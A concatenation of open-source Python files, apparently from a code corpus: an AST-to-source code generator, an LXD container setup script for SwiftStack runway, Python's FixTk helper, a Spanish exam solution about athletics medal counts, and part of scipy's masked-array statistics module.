                generator = generators.pop(0)
                self.print('{0:node}', generator)
            self.print('}}')

    def visitcomprehension(self, node):
        # One " for target in iter [if cond]*" clause of a comprehension.
        self.print(' for {0:node} in {1:node}', node.target, node.iter)
        ifs = list(node.ifs)
        while ifs:
            if_ = ifs.pop(0)
            self.print(" if {0:node}", if_)

    @py3op
    def visitarg(self, node):
        self.print(node.arg)
        if node.annotation:
            with self.no_indent:
                self.print(':{0:node}', node.annotation)
def visit_expr(node):
    """Render the expression *node* to source text and return it."""
    generator = ExprSourceGen()
    generator.visit(node)
    return generator.dumps()
class NoIndent(object):
    """Context manager that zeroes the generator's indent level.

    The previous level is remembered on entry and restored on exit, so
    nested uses behave correctly.
    """

    def __init__(self, gen):
        self.gen = gen

    def __enter__(self):
        self.level = self.gen.level
        self.gen.level = 0

    def __exit__(self, *args):
        self.gen.level = self.level
class Indenter(object):
    """Context manager that emits a newline and indents one level deeper."""

    def __init__(self, gen):
        self.gen = gen

    def __enter__(self):
        # Break the current line (unindented), then deepen the indent.
        self.gen.print('\n', level=0)
        self.gen.level += 1

    def __exit__(self, *args):
        self.gen.level -= 1
class SourceGen(ExprSourceGen):
    """Extends ExprSourceGen with *statement* nodes to emit whole modules."""

    def __init__(self, header=''):
        super(SourceGen, self).__init__()
        # Optional text (e.g. a shebang or banner) emitted before the module.
        print(header, file=self.out)

    def visitModule(self, node):
        children = list(self.children(node))
        # A leading string-expression is the module docstring; re-emit it as
        # a triple-quoted block before the rest of the body.
        if children and isinstance(children[0], _ast.Expr):
            if isinstance(children[0].value, _ast.Str):
                doc = children.pop(0).value
                self.print("'''")
                self.print_lines(doc.s.split('\n'))
                self.print_lines(["'''", '\n', '\n'])
        for node in children:
            self.visit(node)

    def visitFor(self, node):
        self.print('for {0:node} in {1:node}:', node.target, node.iter)
        with self.indenter:
            for stmnt in node.body:
                self.visit(stmnt)
        if node.orelse:
            self.print('else:')
            with self.indenter:
                for stmnt in node.orelse:
                    self.visit(stmnt)

    @py2op
    def visitFunctionDef(self, node):
        #fields = ('name', 'args', 'body', 'decorator_list')
        for decorator in node.decorator_list:
            self.print('@{decorator:node}\n', decorator=decorator)
        args = visit_expr(node.args)
        self.print('def {name}({args}):', name=node.name, args=args)
        with self.indenter:
            for child in node.body:
                self.visit(child)
        return

    @visitFunctionDef.py3op
    def visitFunctionDef(self, node):
        for decorator in node.decorator_list:
            self.print('@{decorator:node}\n', decorator=decorator)
        args = visit_expr(node.args)
        self.print('def {name}({args})', name=node.name, args=args)
        with self.no_indent:
            if node.returns:
                self.print(' -> {:node}:', node.returns)
            else:
                # The extra node.returns argument is unused by the ':'
                # template (string.Formatter ignores unused args).
                self.print(':', node.returns)
        with self.indenter:
            for child in node.body:
                self.visit(child)
        return

    def visitAssign(self, node):
        # Chained assignment: "a = b = value".
        targets = [visit_expr(target) for target in node.targets]
        self.print('{targets} = {value:node}\n', targets=' = '.join(targets), value=node.value)

    def visitAugAssign(self, node):
        self.print('{target:node} {op:node}= {value:node}\n', **node.__dict__)

    def visitIf(self, node, indent_first=True):
        # indent_first=False lets an elif chain print 'el' + 'if ...' inline.
        self.print('if {:node}:', node.test, level=self.level if indent_first else 0)
        with self.indenter:
            if node.body:
                for expr in node.body:
                    self.visit(expr)
            else:
                self.print('pass')
        if node.orelse and len(node.orelse) == 1 and isinstance(node.orelse[0], _ast.If):
            # Single nested If in orelse == elif.
            self.print('el'); self.visit(node.orelse[0], indent_first=False)
        elif node.orelse:
            self.print('else:')
            with self.indenter:
                for expr in node.orelse:
                    self.visit(expr)
        self.print('\n')

    def visitImportFrom(self, node):
        # One "from X import Y" line per imported name.
        for name in node.names:
            self.print("from {0} import {1:node}\n", node.module, name)

    def visitImport(self, node):
        for name in node.names:
            self.print("import {:node}\n", name)

    def visitPrint(self, node):
        # py2 print statement, including the ">> dest" form.
        self.print("print ")
        with self.no_indent:
            if node.dest:
                self.print(">> {:node}", node.dest)
                if not node.values and node.nl:
                    self.print("\n")
                    return
                self.print(", ")
            i = 0
            # NOTE(review): `i` is never incremented in the loop below, so
            # pc() never prints a separator between values — looks like a
            # missing `i += 1`; confirm against upstream `meta`.
            pc = lambda : self.print(", ") if i > 0 else None
            for value in node.values:
                pc()
                self.print("{:node}", value)
            if not node.nl:
                self.print(",")
        self.print("\n")

    def visitExec(self, node):
        self.print('exec {0:node} in {1}, {2}\n', node.body,
                   'None' if node.globals is None else str_node(node.globals),
                   'None' if node.locals is None else str_node(node.locals))

    def visitWith(self, node):
        self.print('with {0:node}', node.context_expr)
        if node.optional_vars is not None:
            self.print(' as {0:node}', node.optional_vars, level=0)
        self.print(':', level=0)
        with self.indenter:
            if node.body:
                for expr in node.body:
                    self.visit(expr)
            else:
                self.print('pass\n')

    def visitGlobal(self, node):
        self.print('global ')
        with self.no_indent:
            names = list(node.names)
            if names:
                name = names.pop(0)
                self.print(name)
                while names:
                    name = names.pop(0)
                    self.print(', {0}', name)
        self.print('\n')

    def visitDelete(self, node):
        self.print('del ')
        targets = list(node.targets)
        with self.no_indent:
            target = targets.pop(0)
            self.print('{0:node}', target)
            while targets:
                target = targets.pop(0)
                self.print(', {0:node}', target)
        self.print('\n')

    def visitWhile(self, node):
        self.print('while {0:node}:', node.test)
        with self.indenter:
            if node.body:
                for expr in node.body:
                    self.visit(expr)
            else:
                self.print("pass")
        if node.orelse:
            self.print('else:')
            with self.indenter:
                for expr in node.orelse:
                    self.visit(expr)
            self.print('\n')
        self.print('\n')

    def visitExpr(self, node):
        self.print('{:node}\n', node.value)

    visitBreak = simple_string('break\n')
    visitPass = simple_string('pass\n')
    visitContinue = simple_string('continue\n')

    def visitReturn(self, node):
        # NOTE(review): a bare `return` (node.value is None) emits nothing,
        # silently dropping the statement from the output — confirm intended.
        if node.value is not None:
            self.print('return {:node}\n', node.value)

    def visitTryExcept(self, node):
        self.print('try:')
        with self.indenter:
            if node.body:
                for stmnt in node.body:
                    self.visit(stmnt)
            else:
                self.print('pass')
        for hndlr in node.handlers:
            self.visit(hndlr)
        if node.orelse:
            self.print('else:')
            with self.indenter:
                for stmnt in node.orelse:
                    self.visit(stmnt)

    @py2op
    def visitExceptHandler(self, node):
        self.print('except')
        with self.no_indent:
            if node.type:
                self.print(" {0:node}", node.type)
            if node.name:
                self.print(" as {0:node}", node.name)
            self.print(":")
        with self.indenter:
            if node.body:
                for stmnt in node.body:
                    self.visit(stmnt)
            else:
                self.print('pass')

    @visitExceptHandler.py3op
    def visitExceptHandler(self, node):
        self.print('except')
        with self.no_indent:
            if node.type:
                self.print(" {0:node}", node.type)
            if node.name:
                # py3: node.name is a plain string, not a node.
                self.print(" as {0}", node.name)
            self.print(":")
        with self.indenter:
            for stmnt in node.body:
                self.visit(stmnt)

    def visitTryFinally(self, node):
        # The try body may itself be a TryExcept node; just re-visit it.
        for item in node.body:
            self.visit(item)
        self.print('finally:')
        with self.indenter:
            for item in node.finalbody:
                self.visit(item)

    @py2op
    def visitClassDef(self, node):
        for decorator in node.decorator_list:
            self.print('@{0:node}\n', decorator)
        self.print('class {0}', node.name)
        with self.no_indent:
            self.print('(')
            bases = list(node.bases)
            if bases:
                base = bases.pop(0)
                self.print("{0:node}", base)
                while bases:
                    base = bases.pop(0)
                    self.print(", {0:node}", base)
            self.print(')')
            self.print(":")
        with self.indenter:
            if node.body:
                for stmnt in node.body:
                    self.visit(stmnt)
            else:
                self.print("pass\n\n")

    @visitClassDef.py3op
    def visitClassDef(self, node):
        for decorator in node.decorator_list:
            self.print('@{0:node}\n', decorator)
        self.print('class {0}', node.name)
        with self.no_indent:
            self.print('(')
            bases = list(node.bases)
            i = 0
            if bases:
                i += 1
                base = bases.pop(0)
                self.print("{0:node}", base)
                while bases:
                    base = bases.pop(0)
                    self.print(", {0:node}", base)
            keywords = list(node.keywords)
            if keywords:
                if i: self.print(', ')
                i += 1
                keyword = keywords.pop(0)
                self.print("{0:node}", keyword)
                while keywords:
                    base = keywords.pop(0)
                    # NOTE(review): prints `keyword` (the first one) rather
                    # than the freshly popped `base` — repeated class
                    # keywords come out wrong; confirm against upstream.
                    self.print(", {0:node}", keyword)
            if node.starargs:
                if i: self.print(', ')
                i += 1
                self.print("*{0:node}", node.starargs)
            if node.kwargs:
                if i: self.print(', ')
                i += 1
                # NOTE(review): kwargs are emitted with a single '*';
                # '**{0:node}' expected — confirm against upstream.
                self.print("*{0:node}", node.kwargs)
            self.print(')')
            self.print(":")
        with self.indenter:
            if node.body:
                for stmnt in node.body:
                    self.visit(stmnt)
            else:
                self.print("pass\n\n")
def python_source(ast, file=sys.stdout):
    '''
    Generate executable python source code from an ast node and write it
    to *file*.

    :param ast: ast node
    :param file: file to write output to.
    '''
    generator = SourceGen()
    generator.visit(ast)
    generator.dump(file)
def dump_python_source(ast):
    '''
    :return: a string containing executable python source code generated
        from an ast node.
    :param ast: ast node
    '''
    generator = SourceGen()
    generator.visit(ast)
    return generator.dumps()
| bsd-3-clause |
swiftstack/runway | make_base_container.py | 1 | 9600 | #!/usr/bin/env python3
#
#Copyright (c) 2016-2021, NVIDIA CORPORATION.
#SPDX-License-Identifier: Apache-2.0
import argparse
import os
import random
import requests
import sys
import tempfile
import uuid
from libs import colorprint
from libs.cli import run_command
SCRIPT_DIR = os.path.abspath(os.path.dirname(__file__))
# assume well-known lvm volume group on host
# ...later we'll figure out how to make this dynamic
VG_NAME = "swift-runway-vg01"
# Images whose names start with this prefix live in SwiftStack's object
# store rather than on a public LXD remote.
SWIFTSTACK_IMAGES_PREFIX = "ss-"
SWIFTSTACK_IMAGES_BASE_URL = "https://tellus.swiftstack.com/v1/AUTH_runway/lxd-images"
# Mirror used when the primary download location is unreachable.
BACKUP_SWIFTSTACK_IMAGES_BASE_URL = (
    "https://cloud.swiftstack.com/v1/AUTH_runway/lxd-images"
)
IMAGE_MANIFEST_OBJECT_NAME = "manifest.json"
# Image tarball layouts supported by import_image().
UNIFIED_TARBALL_TYPE = "unified"
SPLIT_TARBALL_TYPE = "split"
TARBALL_TYPES = [UNIFIED_TARBALL_TYPE, SPLIT_TARBALL_TYPE]
def exit_with_error(error_text):
    """Print *error_text* in the error color and terminate with status 1."""
    colorprint.error(error_text)
    sys.exit(1)
def get_default_image(distro):
    """Map a distro name (case-insensitive) to its default LXD base image."""
    if distro.lower() == "rhel":
        return "images:centos/7/amd64"
    return "ubuntu:16.04"
def is_swiftstack_hosted_image(base_image):
    """Return True when *base_image* uses the SwiftStack-hosted prefix."""
    name = base_image.lower()
    return name.startswith(SWIFTSTACK_IMAGES_PREFIX)
def get_image_manifest(swift_container_name, use_backup_url=False):
    """Fetch and parse the JSON manifest for a hosted container image.

    Tries the primary object-store URL first; on any failure retries once
    against the backup mirror before giving up.
    """
    if use_backup_url:
        base_url = BACKUP_SWIFTSTACK_IMAGES_BASE_URL
    else:
        base_url = SWIFTSTACK_IMAGES_BASE_URL
    manifest_obj_url = "{}/{}/{}".format(
        base_url, swift_container_name, IMAGE_MANIFEST_OBJECT_NAME
    )
    try:
        response = requests.get(manifest_obj_url)
        response.raise_for_status()
        return response.json()
    except Exception as e:
        if use_backup_url:
            # Both locations failed; surface the last error.
            raise Exception(
                "Could not download container image manifest from "
                "'{}'.\n{}".format(manifest_obj_url, e)
            )
        print(
            "Could not download container image manifest from its "
            "primary location. Retrying with backup location..."
        )
        return get_image_manifest(swift_container_name, True)
def is_image_already_imported(fingerprint):
    """Return True when LXD already has an image with *fingerprint*."""
    try:
        run_command("lxc image info {} >/dev/null 2>&1".format(fingerprint), shell=True)
        return True
    except Exception:
        return False
def delete_image_with_alias(alias):
    """Delete the LXD image aliased *alias*, ignoring any failure."""
    try:
        run_command("lxc image delete {}".format(alias))
    except Exception:
        # The alias may simply not exist; deletion is best-effort.
        pass
def download_unified_image_file(manifest, use_backup_url=False):
    """Stream the unified image tarball to a temp file; return its path.

    Falls back to the backup mirror on the first failure, then raises.
    The caller is responsible for unlinking the returned file.
    """
    base_url = (BACKUP_SWIFTSTACK_IMAGES_BASE_URL if use_backup_url
                else SWIFTSTACK_IMAGES_BASE_URL)
    tarball_url = "{}/{}".format(base_url, manifest["tarball-object"])
    try:
        response = requests.get(tarball_url, stream=True)
        response.raise_for_status()
        with tempfile.NamedTemporaryFile(delete=False) as tmp:
            file_path = tmp.name
            for chunk in response.iter_content(chunk_size=1024):
                if chunk:  # filter out keep-alive new chunks
                    tmp.write(chunk)
    except Exception as e:
        if use_backup_url:
            raise Exception(
                "Could not download file from '{}': {}".format(tarball_url, e)
            )
        print(
            "Could not download unified image from its primary "
            "location. Retrying with backup location..."
        )
        return download_unified_image_file(manifest, True)
    return file_path
def import_unified_image(manifest, alias):
    """Download a unified tarball and import it into LXD under *alias*."""
    tarball_path = download_unified_image_file(manifest)
    # An older image may already hold this alias; clear it first.
    delete_image_with_alias(alias)
    run_command("lxc image import {} --alias {}".format(tarball_path, alias))
    os.unlink(tarball_path)
def download_split_image_files(manifest, use_backup_url=False):
    """Stream metadata and rootfs tarballs to temp files.

    Returns a (metadata_path, rootfs_path) tuple; falls back to the backup
    mirror on the first failure, then raises. The caller unlinks the files.
    """
    base_url = (BACKUP_SWIFTSTACK_IMAGES_BASE_URL if use_backup_url
                else SWIFTSTACK_IMAGES_BASE_URL)
    urls = (
        "{}/{}".format(base_url, manifest["metadata-object"]),
        "{}/{}".format(base_url, manifest["rootfs-object"]),
    )
    file_paths = []
    for url in urls:
        try:
            response = requests.get(url, stream=True)
            response.raise_for_status()
            with tempfile.NamedTemporaryFile(delete=False) as tmp:
                file_paths.append(tmp.name)
                for chunk in response.iter_content(chunk_size=1024):
                    if chunk:  # filter out keep-alive new chunks
                        tmp.write(chunk)
        except Exception as e:
            if use_backup_url:
                raise Exception(
                    "Could not download file from '{}': {}".format(url, e)
                )
            print(
                "Could not download split image from its primary "
                "location. Retrying with backup location..."
            )
            return download_split_image_files(manifest, True)
    return tuple(file_paths)
def import_split_image(manifest, alias):
    """Download metadata+rootfs tarballs and import them under *alias*."""
    metadata_path, rootfs_path = download_split_image_files(manifest)
    # An older image may already hold this alias; clear it first.
    delete_image_with_alias(alias)
    run_command(
        "lxc image import {} {} --alias {}".format(
            metadata_path, rootfs_path, alias
        )
    )
    os.unlink(metadata_path)
    os.unlink(rootfs_path)
def import_image(manifest, alias):
    """
    Import an LXD image described by *manifest* under *alias*.

    There are 2 possible image formats: unified and split. We support both.

    For unified format, the manifest will look like this:
    {
        "tarball_type": "unified",
        "fingerprint": "629d2c18b7bb0b52b80dfe62ae309937123d05b563ef057233e7802c9e18c018",
        "tarball-object": "centos7.5/629d2c18b7bb0b52b80dfe62ae309937123d05b563ef057233e7802c9e18c018.tar.gz"
    }

    For split format, the manifest will look like this:
    {
        "tarball_type": "split",
        "fingerprint": "22abbefe0c68943f264a7139c7a699a0b2adfbcf46fc661d2e89b1232301a5de",
        "metadata-object": "centos7.5/meta-22abbefe0c68943f264a7139c7a699a0b2adfbcf46fc661d2e89b1232301a5de.tar.xz",
        "rootfs-object": "centos7.5/22abbefe0c68943f264a7139c7a699a0b2adfbcf46fc661d2e89b1232301a5de.squashfs"
    }

    :raises Exception: for an unknown tarball type, or for a known type
        with no import implementation.
    """
    tarball_type = manifest["tarball_type"]
    if tarball_type not in TARBALL_TYPES:
        raise Exception("Invalid tarball type: {}".format(tarball_type))
    elif tarball_type == UNIFIED_TARBALL_TYPE:
        import_unified_image(manifest, alias)
    elif tarball_type == SPLIT_TARBALL_TYPE:
        import_split_image(manifest, alias)
    else:
        # Defensive: only reachable if TARBALL_TYPES grows without a matching
        # branch above. BUG FIX: the original never called .format() here, so
        # the message would have contained a literal '{}'.
        raise Exception(
            "Tarball type '{}' is valid, but a method to import "
            "it has not been implemented yet.".format(tarball_type)
        )
def import_image_if_needed(base_image):
    """Ensure the SwiftStack-hosted *base_image* is present in LXD.

    Fetches the image's manifest and imports the tarball(s) unless an image
    with the manifest's fingerprint already exists locally.
    """
    if not is_swiftstack_hosted_image(base_image):
        raise Exception("{} is not an image hosted by SwiftStack".format(base_image))
    # Strip the "ss-" prefix to recover the object-store container name.
    container_name = base_image[len(SWIFTSTACK_IMAGES_PREFIX):]
    manifest = get_image_manifest(container_name)
    if is_image_already_imported(manifest["fingerprint"]):
        print("Image '{}' is already imported".format(base_image))
    else:
        print("Importing image '{}'...".format(base_image))
        import_image(manifest, base_image)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("distro", type=str, help="Container distro")
parser.add_argument("cname", metavar="containername", help="Container name")
parser.add_argument("volsize", help="Volume size")
parser.add_argument("volcount", type=int, help="Volume count")
parser.add_argument(
"baseimage",
nargs="?",
help="Base image. Defaults: 'images:centos/7/amd64' "
"for RHEL distro, 'ubuntu:16.04' otherwise",
)
args = parser.parse_args()
distro = args.distro
container_name = args.cname
base_image = args.baseimage
volume_size = args.volsize
volume_count = args.volcount
if is_swiftstack_hosted_image(distro):
import_image_if_needed(distro)
default_image = distro
else:
default_image = get_default_image(distro)
if base_image is None:
base_image = default_image
try:
# make a container profile that maps 8 block devices to the guest
rand_file_name = str(uuid.UUID(int=random.getrandbits(128)))
run_command(
"./make_lxc_profile.py {} {} {} {} > "
"/tmp/{}".format(
container_name, VG_NAME, volume_size, volume_count, rand_file_name
),
cwd=SCRIPT_DIR,
shell=True,
)
run_command("lxc profile create {}-profile".format(container_name))
run_command(
"cat /tmp/{} | lxc profile edit {}-profile".format(
rand_file_name, container_name
),
cwd=SCRIPT_DIR,
shell=True,
)
# launch the new container
print("Trying to launch container from base image {}".format(base_image))
run_command(
"lxc launch {} {} -p {}-profile || "
"lxc launch {} {} -p {}-profile".format(
base_image,
container_name,
container_name,
default_image,
container_name,
container_name,
),
shell=True,
)
except Exception as e:
exit_with_error(str(e))
| apache-2.0 |
michalliu/OpenWrt-Firefly-Libraries | staging_dir/host/lib/python2.7/lib-tk/FixTk.py | 26 | 2942 | import sys, os
# Delay import _tkinter until we have set TCL_LIBRARY,
# so that Tcl_FindExecutable has a chance to locate its
# encoding directory.
# Unfortunately, we cannot know the TCL_LIBRARY directory
# if we don't know the tcl version, which we cannot find out
# without import Tcl. Fortunately, Tcl will itself look in
# <TCL_LIBRARY>\..\tcl<TCL_VERSION>, so anything close to
# the real Tcl library will do.
# Expand symbolic links on Vista
try:
import ctypes
ctypes.windll.kernel32.GetFinalPathNameByHandleW
except (ImportError, AttributeError):
def convert_path(s):
return s
else:
def convert_path(s):
assert isinstance(s, str) # sys.prefix contains only bytes
udir = s.decode("mbcs")
hdir = ctypes.windll.kernel32.\
CreateFileW(udir, 0x80, # FILE_READ_ATTRIBUTES
1, # FILE_SHARE_READ
None, 3, # OPEN_EXISTING
0x02000000, # FILE_FLAG_BACKUP_SEMANTICS
None)
if hdir == -1:
# Cannot open directory, give up
return s
buf = ctypes.create_unicode_buffer(u"", 32768)
res = ctypes.windll.kernel32.\
GetFinalPathNameByHandleW(hdir, buf, len(buf),
0) # VOLUME_NAME_DOS
ctypes.windll.kernel32.CloseHandle(hdir)
if res == 0:
# Conversion failed (e.g. network location)
return s
s = buf[:res].encode("mbcs")
# Ignore leading \\?\
if s.startswith("\\\\?\\"):
s = s[4:]
if s.startswith("UNC"):
s = "\\" + s[3:]
return s
prefix = os.path.join(sys.prefix,"tcl")
if not os.path.exists(prefix):
# devdir/externals/tcltk/lib
prefix = os.path.join(sys.prefix, "externals", "tcltk", "lib")
prefix = os.path.abspath(prefix)
# if this does not exist, no further search is needed
if os.path.exists(prefix):
prefix = convert_path(prefix)
if "TCL_LIBRARY" not in os.environ:
for name in os.listdir(prefix):
if name.startswith("tcl"):
tcldir = os.path.join(prefix,name)
if os.path.isdir(tcldir):
os.environ["TCL_LIBRARY"] = tcldir
# Compute TK_LIBRARY, knowing that it has the same version
# as Tcl
import _tkinter
ver = str(_tkinter.TCL_VERSION)
if "TK_LIBRARY" not in os.environ:
v = os.path.join(prefix, 'tk'+ver)
if os.path.exists(os.path.join(v, "tclIndex")):
os.environ['TK_LIBRARY'] = v
# We don't know the Tix version, so we must search the entire
# directory
if "TIX_LIBRARY" not in os.environ:
for name in os.listdir(prefix):
if name.startswith("tix"):
tixdir = os.path.join(prefix,name)
if os.path.isdir(tixdir):
os.environ["TIX_LIBRARY"] = tixdir
| gpl-2.0 |
csaldias/python-usm | Certámenes resueltos/Certamen 2 2014-1 (CSSJ y CSV)/pregunta3.py | 1 | 2707 | #Datos del problema.
competencia = {
'pista': {'v100mt','v400mt','v800mt','v3000mt','d100mt','d400mt'},
'campo': {'vbala','vdisco','vlargo','dbala'}
}
puntaje = {
'lugar 1': 12, #Medalla
'lugar 2': 9, #Medalla
'lugar 3': 7, #Medalla
'lugar 4': 5,
'lugar 5': 4,
'lugar 6': 3,
'lugar 7': 2,
'lugar 8': 1
}
resultado = {
'usm' : [('mrios','v400mt',9), ('nmassu','v3000mt',12), ('jrojas','vdisco',12)],
'usach': [('jramos','d400mt',5), ('lsoto','d400mt',9), ('mruiz','v800mt',7)],
'uc' : [('mhard','v100mt',3), ('msolis','d3000mt',5), ('lrozas','dbala',5)]
}
#Pregunta a)
def participante_prueba(competencia, resultado, prueba):
    """Return the names of all competitors who entered any event of
    category *prueba* ('pista' or 'campo'), in result order."""
    eventos = competencia[prueba]
    return [nombre
            for resultados_u in resultado.values()
            for nombre, evento, _ in resultados_u
            if evento in eventos]
#Pregunta b)
def mayor_cantidad(resultado, puntaje):
    """Return the university with the most medal finishes (places 1 to 3).

    Ties are resolved in favor of the university iterated last, exactly as
    the original ``>=`` comparison did.
    """
    # Point values that correspond to a medal.
    medallas = (puntaje['lugar 1'], puntaje['lugar 2'], puntaje['lugar 3'])
    ganadora = ""
    maximo = -1
    for universidad, competidores in resultado.items():
        # Count this university's medal finishes.
        conteo = sum(1 for (nombre, prueba, ptje) in competidores
                     if ptje in medallas)
        if conteo >= maximo:
            maximo = conteo
            ganadora = universidad
    return ganadora
#Pregunta c)
def prueba_sin_medallas(resultado, puntaje):
    """Return the events (pruebas) in which no competitor won a medal.

    Parameters
    ----------
    resultado : dict
        Maps university -> list of (competitor, event, points) tuples.
    puntaje : dict
        Maps place name ('lugar 1', ...) -> points; places 1-3 are medals.

    Returns
    -------
    list
        One entry per non-medal competitor whose event produced no medal at
        all (same per-competitor multiplicity as the original scan).

    BUG FIX: the previous single-pass version only removed an event when a
    medal entry was processed *after* a non-medal entry of the same event,
    so the output depended on dict iteration order.  We now collect the
    medal-winning events in a first pass and filter against the full set.
    """
    medallas = (puntaje['lugar 1'], puntaje['lugar 2'], puntaje['lugar 3'])
    # First pass: every event in which at least one medal was won.
    con_medalla = set()
    for competidores in resultado.values():
        for nombre, prueba, ptje in competidores:
            if ptje in medallas:
                con_medalla.add(prueba)
    # Second pass: keep the events of non-medal competitors that never
    # produced a medal.
    pruebas_no_medalla = []
    for competidores in resultado.values():
        for nombre, prueba, ptje in competidores:
            if ptje not in medallas and prueba not in con_medalla:
                pruebas_no_medalla.append(prueba)
    return pruebas_no_medalla
#Prueba
print participante_prueba(competencia, resultado, 'campo')
print mayor_cantidad(resultado, puntaje)
print prueba_sin_medallas(resultado, puntaje) | mit |
kleskjr/scipy | scipy/stats/mstats_extras.py | 40 | 14219 | """
Additional statistics functions with support for masked arrays.
"""
# Original author (2007): Pierre GF Gerard-Marchant
from __future__ import division, print_function, absolute_import
__all__ = ['compare_medians_ms',
'hdquantiles', 'hdmedian', 'hdquantiles_sd',
'idealfourths',
'median_cihs','mjci','mquantiles_cimj',
'rsh',
'trimmed_mean_ci',]
import numpy as np
from numpy import float_, int_, ndarray
import numpy.ma as ma
from numpy.ma import MaskedArray
from . import mstats_basic as mstats
from scipy.stats.distributions import norm, beta, t, binom
def hdquantiles(data, prob=list([.25,.5,.75]), axis=None, var=False,):
    """
    Computes quantile estimates with the Harrell-Davis method.

    The quantile estimates are calculated as a weighted linear combination
    of order statistics.

    Parameters
    ----------
    data : array_like
        Data array.
    prob : sequence, optional
        Sequence of quantiles to compute.
    axis : int or None, optional
        Axis along which to compute the quantiles. If None, use a flattened
        array.
    var : bool, optional
        Whether to return the variance of the estimate.

    Returns
    -------
    hdquantiles : MaskedArray
        A (p,) array of quantiles (if `var` is False), or a (2,p) array of
        quantiles and variances (if `var` is True), where ``p`` is the
        number of quantiles.
    """
    def _hd_1D(data,prob,var):
        "Computes the HD quantiles for a 1D array. Returns nan for invalid data."
        xsorted = np.squeeze(np.sort(data.compressed().view(ndarray)))
        # Don't use length here, in case we have a numpy scalar
        n = xsorted.size
        # Row 0 holds the quantile estimates, row 1 their variances.
        hd = np.empty((2,len(prob)), float_)
        # Fewer than two data points: estimate (and variance) is undefined.
        if n < 2:
            hd.flat = np.nan
            if var:
                return hd
            return hd[0]
        # Evaluation grid for the Beta CDF: i/n for i = 0..n.
        v = np.arange(n+1) / float(n)
        betacdf = beta.cdf
        for (i,p) in enumerate(prob):
            # Weight of each order statistic: increments of the
            # Beta((n+1)p, (n+1)(1-p)) CDF over consecutive grid points.
            _w = betacdf(v, (n+1)*p, (n+1)*(1-p))
            w = _w[1:] - _w[:-1]
            # Weighted combination of the order statistics is the estimate.
            hd_mean = np.dot(w, xsorted)
            hd[0,i] = hd_mean
            #
            # Weighted second central moment: variance of the estimate.
            hd[1,i] = np.dot(w, (xsorted-hd_mean)**2)
            #
        # Extreme probabilities map directly to the sample extremes.
        hd[0, prob == 0] = xsorted[0]
        hd[0, prob == 1] = xsorted[-1]
        if var:
            # No meaningful variance at p == 0 or p == 1.
            hd[1, prob == 0] = hd[1, prob == 1] = np.nan
            return hd
        return hd[0]
    # Initialization & checks
    data = ma.array(data, copy=False, dtype=float_)
    p = np.array(prob, copy=False, ndmin=1)
    # Computes quantiles along axis (or globally)
    if (axis is None) or (data.ndim == 1):
        result = _hd_1D(data, p, var)
    else:
        if data.ndim > 2:
            raise ValueError("Array 'data' must be at most two dimensional, "
                             "but got data.ndim = %d" % data.ndim)
        result = ma.apply_along_axis(_hd_1D, axis, data, p, var)
    # Mask any nan produced for degenerate slices.
    return ma.fix_invalid(result, copy=False)
def hdmedian(data, axis=-1, var=False):
    """Harrell-Davis estimate of the median along the given axis.

    Parameters
    ----------
    data : ndarray
        Data array.
    axis : int, optional
        Axis along which to compute the estimate. If None, use a flattened
        array.
    var : bool, optional
        Whether to return the variance of the estimate as well.
    """
    # The median is the 0.5 quantile; squeeze() drops the length-1
    # probability axis from the result.
    estimate = hdquantiles(data, [0.5], axis=axis, var=var)
    return estimate.squeeze()
def hdquantiles_sd(data, prob=list([.25,.5,.75]), axis=None):
    """
    The standard error of the Harrell-Davis quantile estimates by jackknife.

    Parameters
    ----------
    data : array_like
        Data array.
    prob : sequence, optional
        Sequence of quantiles to compute.
    axis : int, optional
        Axis along which to compute the quantiles. If None, use a flattened
        array.

    Returns
    -------
    hdquantiles_sd : MaskedArray
        Standard error of the Harrell-Davis quantile estimates.
    """
    def _hdsd_1D(data,prob):
        "Computes the std error for 1D arrays."
        xsorted = np.sort(data.compressed())
        n = len(xsorted)
        #.........
        hdsd = np.empty(len(prob), float_)
        # Too few points: the jackknife is undefined.
        if n < 2:
            hdsd.flat = np.nan
        vv = np.arange(n) / float(n-1)
        betacdf = beta.cdf
        for (i,p) in enumerate(prob):
            # Harrell-Davis weights over the reduced (n-1)-point grid.
            _w = betacdf(vv, (n+1)*p, (n+1)*(1-p))
            w = _w[1:] - _w[:-1]
            # Leave-one-out estimates: for each k, re-estimate the quantile
            # from the sample with the k-th order statistic removed.
            mx_ = np.fromiter([np.dot(w,xsorted[np.r_[list(range(0,k)),
                                                      list(range(k+1,n))].astype(int_)])
                               for k in range(n)], dtype=float_)
            # Jackknife variance of the n leave-one-out estimates.
            mx_var = np.array(mx_.var(), copy=False, ndmin=1) * n / float(n-1)
            hdsd[i] = float(n-1) * np.sqrt(np.diag(mx_var).diagonal() / float(n))
        return hdsd
    # Initialization & checks
    data = ma.array(data, copy=False, dtype=float_)
    p = np.array(prob, copy=False, ndmin=1)
    # Computes quantiles along axis (or globally)
    if (axis is None):
        result = _hdsd_1D(data, p)
    else:
        if data.ndim > 2:
            raise ValueError("Array 'data' must be at most two dimensional, "
                             "but got data.ndim = %d" % data.ndim)
        result = ma.apply_along_axis(_hdsd_1D, axis, data, p)
    return ma.fix_invalid(result, copy=False).ravel()
def trimmed_mean_ci(data, limits=(0.2,0.2), inclusive=(True,True),
                    alpha=0.05, axis=None):
    """Confidence interval for the trimmed mean along the given axis.

    Parameters
    ----------
    data : array_like
        Input data.
    limits : {None, tuple}, optional
        Fractions (floats between 0. and 1., relative to the number of
        unmasked data) to cut on each side of the array before averaging.
        Either entry may be None for an open interval.
        Defaults to (0.2, 0.2).
    inclusive : (2,) tuple of boolean, optional
        Whether the number of data points masked on each side should be
        rounded (True) or truncated (False). Defaults to (True, True).
    alpha : float, optional
        Confidence level of the interval. Defaults to 0.05.
    axis : int, optional
        Axis along which to cut; None uses a flattened version of `data`.
        Defaults to None.

    Returns
    -------
    trimmed_mean_ci : (2,) ndarray
        Lower and upper confidence bounds of the trimmed mean.
    """
    masked = ma.array(data, copy=False)
    trimmed = mstats.trimr(masked, limits=limits, inclusive=inclusive, axis=axis)
    center = trimmed.mean(axis)
    # Standard error of the trimmed mean, computed from the untrimmed data.
    stde = mstats.trimmed_stde(masked, limits=limits, inclusive=inclusive,
                               axis=axis)
    dof = trimmed.count(axis) - 1
    # Student-t critical value at the requested confidence level.
    margin = t.ppf(1 - alpha/2., dof) * stde
    return np.array((center - margin, center + margin))
def mjci(data, prob=[0.25,0.5,0.75], axis=None):
    """Maritz-Jarrett estimate of the standard error of selected quantiles.

    Parameters
    ----------
    data : ndarray
        Data array.
    prob : sequence, optional
